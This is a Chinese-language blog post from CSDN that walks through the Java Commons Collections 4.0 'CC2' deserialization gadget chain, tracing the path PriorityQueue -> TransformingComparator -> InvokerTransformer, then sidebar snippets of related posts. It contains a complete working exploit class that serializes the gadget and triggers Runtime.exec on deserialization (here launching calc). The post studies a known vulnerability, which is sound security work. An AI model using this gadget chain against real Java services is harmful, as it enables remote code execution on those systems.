Java cc链2 分析

最新推荐文章于 2024-08-30 18:40:43 发布
最新推荐文章于 2024-08-30 18:40:43 发布
阅读量198 收藏
点赞数
分类专栏: JAVA 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/132408759
版权

环境

cc4

<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-collections4 -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

分析

由ysoSerial 出口和之前一样InvokerTransformer
在这里插入图片描述
跟进TransformingComparator#compare
在这里插入图片描述
往上PriorityQueue#siftDownUsingComparator
在这里插入图片描述

再往上
PriorityQueue#siftDown
在往上heapify
然后到readObject
在这里插入图片描述
在这里插入图片描述
于是链子有了
我们尝试写一个payload试试看
在这里插入图片描述
注意size最少要2才能进siftDown 所以我们要给priorityQueue add元素
且在add第二个元素的时候会调siftUp, siftUp最后也能到compare
为了避免这种情况我们需要反射赋值TransformingComparator

于是最终代码如下

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC2 {



    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer<Object> chainedTransformer = new ChainedTransformer<>(transformers);
        TransformingComparator<Object, Object> transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue(1,transformingComparator);

        priorityQueue.add(1);
        priorityQueue.add(1);


        Field fieldTransformer = TransformingComparator.class.getDeclaredField("transformer");
        fieldTransformer.setAccessible(true);
        fieldTransformer.set(transformingComparator,chainedTransformer);


        serial(priorityQueue);
        unSerial("ser.bin");


    }
    public static void serial(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unSerial(String path) throws Exception{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(path));
        return ois.readObject();
    }
}
丨Arcueid丨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全 CC2分析
Elite的博客
03-16 1184
CC2适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类的readObject方法进行了修复,导致cc1无法使用,故产生了cc2,cc2与cc3相似,都使用了字节码的加载,并且后续的触发也基本相同
Java反序列化-CC2分析
Huangjiazhen711的博客
10-14 195
首先看一下作为跳板的 TransformingComparator 类是怎么调用到利用的在 TransformingComparator#compare 方法中,调用到了transform 方法去修饰 obj1、obj2 的值。就是这个方法调用到了利用接着在看一下 PriorityQueue 类是怎么作为入口点去利用的在PriorityQueue#readObject 方法中,将反序列化的数据存放在queue 字段中,之后调用 heapify 方法来对数据进行调整,形成二叉堆。
CC2分析与复现
weixin_42974824的博客
08-25 1035
CC2分析与复现
9-java安全——关于构造CC2的几个问题
网络安全
07-23 495
思考一下:CC2的poc利用代码中为什么要向queue队列中添加至少2个元素?并且PriorityQueue队列中的queue属性被transient关键字修饰具有“不会序列化”语义,在反序列化过程中为什么还能从流中读取queue的数据,流中的数据又从何而来? readObject方法是怎么从流中读取queue的数据 使用SerializationDumper工具解析对象序列化的数据,Fields字段中并没有看到PriorityQueue的queue属性,说明queue确实没有参与序列化.
cc2(小宇特详解)
小宇的web博客
02-19 3841
cc2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc1的区别 cc2利用中使用了动态字节码编程来构造poc cc2没有使用反序列化漏洞 cc利用流程 构造一个TestTemplatesImpl恶意类转成字节码,然后通过反射将恶意类的字节码注入到TemplatesImpl对象的_bytecodes属性(构造利用核心代码) 创建一个InvokerTransformer并传递一个newTransformer方法,然后将Invoker
8-java安全——java反序列化CC2分析
网络安全
07-19 2774
上一篇分析CC1,本篇继续分析ysoserial工具的 apache commons collections 2利用CC1在实际利用过程存在一些限制,例如jdk1.8版本以上已经无法利用反序列化漏洞了,通过分析发现jdk8u181版本中改写了sun.reflect.annotation.AnnotationInvocationHandler类的readObject方法,CC1在jdk8版本以上已经被修复了,因此jdk8版本以上重新构造了一条新的利用CC2)。 不过CC2使用
Java安全 CC1分析
Elite的博客
01-20 1820
Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。
java反序列化 cc1 分析
m0_64815693的博客
04-17 1333
java反序列化 cc1 分析
java反序列化 cc6 分析
m0_64815693的博客
04-22 1096
java反序列化 cc6 分析
Java反序列化之CC1分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1和那两种玩法
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3563
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5587
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1303
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用。...
Java基础(6)- Java代码笔记3
最新发布
weixin_47062560的博客
08-30 468
数据类型[][] 数组名 = new 数据类型[m][n]数据类型 数组名[][] = new 数据类型[m][n]数据类型[] 数组名[] = new 数据类型[m][n]m:代表二维数组长度n:代表二维数组中每个一维数组的长度。
启动Application 报错:no mapping for GET /(已解决)
qq_3512323979的博客
08-26 5489
no mapping for GET /因为我使用的是框架嘛,然后生成了一个SpringBoot项目后,resources下面就会有一个static的类,用于存放静态资源类,后面我把静态资源放在里面,但是启动启动类后,报错一直匹配不到。: 正常的话,我们使用SpringBoot框架,他会给我们提供许多便利,包括静态资源的自动服务,默认的话,他会去。报这个错可能还有其他原因,我的是因为这个,大家可以根据日志信息一步步检查,肯定可以解决的!类并覆盖其方法时,就会失去静态资源的自动服务
[C++规范] 访问类成员变量的方式:直接访问还是通过成员函数访问?
Loewen丶的小窝
08-26 5707
在面向对象编程(OOP)中,通过成员函数(如`ME_HardwareTypeEnum Type() const;` 和 `int Id() const;`)来访问类的私有或受保护成员(如`m_hardwareType` 和 `m_id`),而不是直接通过公共成员访问,是一种更好的做法。
操作系统原子操作
zzt_is_me的博客
08-28 3628
所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。2、type只能是整数相关的类型,浮点型和自定义类型无法使用。功能:把value赋值给*ptr,并返回*ptr的旧值。功能:以上操作返回的是*ptr与value计算后的值。使用原子操作实现一个线程安全的无锁队列。1、该功能并不通用,有些编译器不支持。功能:以上操作返回的是*ptr的旧值。
Spring WebFlux – CVE-2023-34034 – 撰写和概念验证
技术超强的网络安全平台
08-28 2285
Spring框架是一个广泛使用的基于Java的应用程序框架,为企业级Java应用的开发提供基础设施支持。是一个功能强大的身份验证和访问控制框架,也是保护基于 Spring 的应用程序的行业标准。它提供身份验证和授权,并且可以轻松扩展以满足自定义要求。Spring WebFlux是在 Spring 5 中引入的,作为传统框架的响应式编程替代方案。Spring WebFlux 的核心设计旨在处理异步、非阻塞和反应式编程范例。它提供了一种反应式编程模型,允许开发人员构建可扩展、响应迅速且具有弹性的应用程序。
基于jenkins部署maven项目
静水深流
08-26 2988
如上所示,构建后,我们处于项目的根目录之下,可以进行后续的操作,如启动target目录下的jar包、将jar包传输到需要部署的服务器上、打docker镜像bing上传等等,需要根据实际情况进行选择,而这些都可以在“Add post-build step”选项中进行选择。我们主要关注上述几个部分,在General部分,可以对项目进行一个简单的描述,源码管理部分,需要配置对应的源码url,如下图所示。如上所示,选择“构建一个maven项目”,如果没有改选项,则需要安装maven构建的插件,请参考之前的文章。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值